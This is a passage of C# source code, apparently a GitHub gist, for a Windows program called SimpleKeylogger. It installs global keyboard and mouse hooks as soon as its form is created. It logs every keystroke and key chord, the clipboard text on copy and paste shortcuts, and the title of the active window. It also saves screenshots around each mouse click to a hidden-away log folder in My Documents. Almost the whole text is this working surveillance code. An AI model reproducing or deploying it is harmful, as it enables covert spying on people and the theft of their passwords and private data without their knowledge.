case Keys.LWin:
CompleteChord();
_winDown = false; break;
default:
if (!HasControlKeys && !IsNormalKey(k))
{
// TODO: special case for characters
_normalKeys.Add(k);
CompleteChord();
}
break;
}
_lastKeyDown = Keys.None;
}
static bool IsNormalKey(Keys key)
{
int k = (int)key;
return
(k >= (int)Keys.D0 && k <= (int)Keys.Z) ||
(k >= (int)Keys.NumPad0 && k <= (int)Keys.Divide) ||
(k >= (int)Keys.Oem1 && k <= (int)Keys.OemBackslash) || // for some laptop keyboards
key == Keys.Space;
}
void CompleteChord()
{
_completed = true;
if (_normalKeys.Count > 0)
{
StringBuilder sb = new StringBuilder();
sb.Append("[");
if (_ctrlDown) { sb.Append("Ctrl+"); }
if (_altDown) { sb.Append("Alt+"); }
if (_winDown) { sb.Append("Win+"); }
if (_shiftDown) { sb.Append("Shift+"); }
foreach (Keys k in _normalKeys)
{
sb.Append(k.ToString());
}
sb.Append("]");
_stringRep = sb.ToString();
// Cliboard actions
// Note: modifiers are OK (sometimes Ctrl+Alt+V, Ctrl+Shift+V etc are paste special
// and similar)
if (_ctrlDown &&
_normalKeys.Contains(Keys.V) ||
_normalKeys.Contains(Keys.C) ||
_normalKeys.Contains(Keys.X))
{
if (ClipboardAction != null) { ClipboardAction(this, EventArgs.Empty); }
}
}
}
public override string ToString()
{
if (Completed) { return _stringRep; }
return base.ToString();
}
}
public class SimpleKeylogger
{
public static readonly String LogPath =
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments), @"Klog-Logs");
public static readonly String LogFileName =
Path.Combine(LogPath, "Activity.txt");
// Helpers
ForegroundWindow _window = new ForegroundWindow();
KeyChord _keyChord = new KeyChord();
int _nextBitmapNum = 0;
public SimpleKeylogger()
{
_keyChord.ClipboardAction += new EventHandler(OnClipboardAction);
}
void OnClipboardAction(object sender, EventArgs e)
{
String cb = Clipboard.GetText();
if (!String.IsNullOrEmpty(cb))
{
LogEvent(Environment.NewLine + "[Clipboard: " + cb + "]" + Environment.NewLine);
}
}
public void OnKeyDown(object sender, KeyEventArgs e)
{
_keyChord.AddKeyDown(e.KeyData);
}
public void OnKeyUp(object sender, KeyEventArgs e)
{
_keyChord.AddKeyUp(e.KeyData);
if (_keyChord.Completed)
{
String s = _keyChord.ToString();
if (!String.IsNullOrEmpty(s)) { s += Environment.NewLine; }
_keyChord.Reopen();
LogEvent(s);
}
}
void LogEvent(String s)
{
if (String.IsNullOrEmpty(s)) { return; }
if (_window.CheckHasChanged())
{
String date = DateTime.Now.ToString("yyyy-MM-dd HH:mm:ss");
String app = Environment.NewLine + "--- " + date + " App: " + _window.Text + Environment.NewLine;
File.AppendAllText(LogFileName, app);
}
File.AppendAllText(LogFileName, s);
}
public void OnKeyPress(object sender, KeyPressEventArgs e)
{
if (Char.GetUnicodeCategory(e.KeyChar) != UnicodeCategory.Control)
{
LogEvent(e.KeyChar.ToString());
}
}
public void OnMouseActivity(object sender, MouseEventArgs e)
{
if (e.Clicks == 0)
{
String filename = GetNextBitmapFilename();
CaptureClickBitmap(e.Location, filename);
LogEvent("[Click #" + (_nextBitmapNum - 1) + "]");
}
}
String GetNextBitmapFilename()
{
while (true)
{
String filename = Path.Combine(LogPath, "Click" + _nextBitmapNum.ToString("00000") + ".png");
++_nextBitmapNum;
if (!File.Exists(filename)) { return filename; }
}
}
[UIPermission(SecurityAction.Assert)]
void CaptureClickBitmap(Point clickLocation, String filename)
{
int Off = 4;
int r = 100;
Rectangle bounds = new Rectangle(clickLocation.X - r, clickLocation.Y - r, r * 2, r * 2);
using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height))
{
using (Graphics g = Graphics.FromImage(bitmap))
{
g.CopyFromScreen(bounds.Location, Point.Empty, bounds.Size);
g.DrawEllipse(Pens.Yellow, r - Off, r - Off, Off * 2, Off * 2);
--Off;
g.DrawEllipse(Pens.Red, r - Off, r - Off, Off * 2, Off * 2);
//g.DrawLine(Pens.Red, r - Off, r - Off, r + Off, r + Off);
//g.DrawLine(Pens.Red, r - Off, r + Off, r + Off, r - Off);
}
bitmap.Save(filename, ImageFormat.Png);
}
}
}
public partial class OptionsForm : Form
{
UserActivityHook _hook;
public OptionsForm()
{
Directory.CreateDirectory(Path.GetDirectoryName(SimpleKeylogger.LogFileName));
InitializeKeylogger();
StartHooks();
}
#region Hooks
void InitializeKeylogger()
{
SimpleKeylogger logger = new SimpleKeylogger();
_hook = new UserActivityHook(false, false);
_hook.KeyPress += logger.OnKeyPress;
_hook.KeyUp += logger.OnKeyUp;
_hook.KeyDown += logger.OnKeyDown;
_hook.OnMouseActivity += logger.OnMouseActivity;
}
void StartHooks()
{
_hook.Start(true,true); // (MouseClicks, Keylog)
}
void StopHooks()
{
if (_hook != null) { _hook.Stop(true, true, false); }
}
#endregion
}
public class ForegroundWindow
{
String _text;
public String Text { get { return _text; } }
public bool CheckHasChanged()
{
String oldText = _text;
UpdateText();
return oldText != _text;
}
void UpdateText()
{
const int nChars = 512;
IntPtr handle = GetForegroundWindow();
StringBuilder buffer = new StringBuilder(nChars);
if (GetWindowText(handle, buffer, nChars) > 0)
{
_text = buffer.ToString();
}
else
{
_text = "unknown";
}
_text = _text + " (" + handle + ")";
}
[DllImport("user32.dll")]
static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
static extern int GetWindowText(IntPtr hWnd, StringBuilder text, int count);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment